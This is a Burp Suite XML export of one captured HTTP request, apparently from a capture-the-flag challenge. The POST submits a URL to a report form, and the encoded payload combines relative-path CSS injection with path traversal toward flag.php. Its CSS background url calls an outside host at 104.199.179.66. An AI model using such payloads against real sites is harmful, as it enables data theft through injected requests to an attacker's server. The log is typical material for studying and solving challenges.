<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Wed Dec 19 19:57:50 CST 2018">
  <item>
    <time>Wed Dec 19 19:56:57 CST 2018</time>
    <url><![CDATA[http://120.114.62.45:31337/inc/send.php]]></url>
    <host ip="120.114.62.45">120.114.62.45</host>
    <port>31337</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/inc/send.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /inc/send.php HTTP/1.1
Host: 120.114.62.45:31337
Content-Length: 183
Cache-Control: max-age=0
Origin: http://120.114.62.45:31337
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://120.114.62.45:31337/inc/guard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

report=http%3A%2F%2F120.114.62.45%3A31337%2Finc%2F1%2F%253Fquery%3D%257B%257D*%257Bbackground%253Aurl%28http%3A%25252F%25252F104.199.179.66%25252Ftest%29%257D%252F..%252f..%2Fflag.php]]></request>
    <status>200</status>
    <responselength>201</responselength>
    <mimetype>text</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 19 Dec 2018 11:55:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35

Thank you... I'll check this out...]]></response>
    <comment></comment>
  </item>
</items>
